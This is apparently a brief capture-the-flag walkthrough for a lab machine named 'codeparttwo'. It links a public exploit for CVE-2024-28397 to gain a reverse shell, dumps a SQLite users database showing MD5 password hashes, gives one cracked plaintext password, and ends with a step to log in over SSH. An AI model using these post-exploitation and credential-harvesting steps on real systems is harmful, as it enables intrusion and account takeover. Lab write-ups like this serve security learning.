SqlLite Interaction Commands

1st Step :

https://github.com/ExtremeUday/Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-arrow-up-right

steps are written in this to get the reverse shell , after getting the reverse shell

cd instance
cat user
pp@codeparttwo:~/app/instance$ ls

ls
users.db
app@codeparttwo:~/app/instance$ 
app@codeparttwo:~/app/instance$ cat users.db
cat users.db
OOJ%%Wtablecode_snippetcode_snippetCREATE TABLE code_snippet (
	id INTEGER NOT NULL, 
	user_id INTEGER NOT NULL, 
	code TEXT NOT NULL, 
	PRIMARY KEY (id), 
	FOREIGN KEY(user_id) REFERENCES user (id)
)�0CtableuseruserCREATE TABLE user (
	id INTEGER NOT NULL, 
	username VARCHAR(80) NOT NULL, 
	password_hash VARCHAR(128) NOT NULL, 
	PRIMARY KEY (id), 
	UNIQUE (username)
M��}M.!Mattacker10166c55b51fd5fbda875ab6c318442255-Mattacker9166c55b51fd5fbda875ab6c318442255'Mappa97588c0e2fa3a024876339e27aeb42e)Mmarco649c9d65a206a75f5abe509fe128bce5
app@codeparttwo:~/app/instance$ 

profile : marco

pass : 649c9d65a206a75f5abe509fe128bce5 after cracking pass is

pass
sweetangelbabylove

2nd Step :

now login in ssh

Last updated

Was this helpful?